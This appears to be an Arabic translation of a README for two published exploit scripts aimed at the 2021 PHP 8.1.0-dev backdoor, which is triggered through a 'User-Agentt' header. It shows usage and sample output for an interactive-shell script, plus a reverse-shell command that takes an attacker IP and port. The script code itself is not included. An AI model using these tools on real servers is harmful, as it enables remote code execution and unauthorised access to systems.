
سكربت شل نظام خلفي PHP 8.1.0-dev
سكريبت شِل النظام للباب الخلفي في PHP 8.1.0-dev

تم إطلاق PHP 8.1.0-dev مع باب خلفي في 28 مارس 2021، لكن تم اكتشاف الباب الخلفي وإزالته بسرعة. إذا كانت نسخة PHP هذه تعمل على خادم، فيمكن للمهاجم تنفيذ أكواد عشوائية عن طريق إرسال ترويسة User-Agentt.
تمت استعادة الكود الأصلي بعد اكتشاف المشكلة، لكن عُبث به مرة ثانية. كان من شأن هذا الاختراق أن يُنشئ باباً خلفياً في أي مواقع ويب تشغّل نسخة PHP المخترقة، مما يتيح للقراصنة تنفيذ أكواد عن بُعد على الموقع.
اقرأ المقال كاملاً: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
يستخدم سكريبت الاستغلال القصير هذا backdoor_php_8.1.0-dev.py الباب الخلفي لتوفير شِل نظام شبه حقيقي على المضيف. يمكنك العثور عليه على Exploit DB.
الاستخدام:
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:
http://a.b.c.d
Interactive shell is opened on http://a.b.c.d
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
يمنحك سكريبت الاستغلال القصير هذا revshell_php_8.1.0-dev.py شِل عكسي على الهدف.
الاستخدام:
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

كن فضولياً، فالتعلم هو الحياة! 😃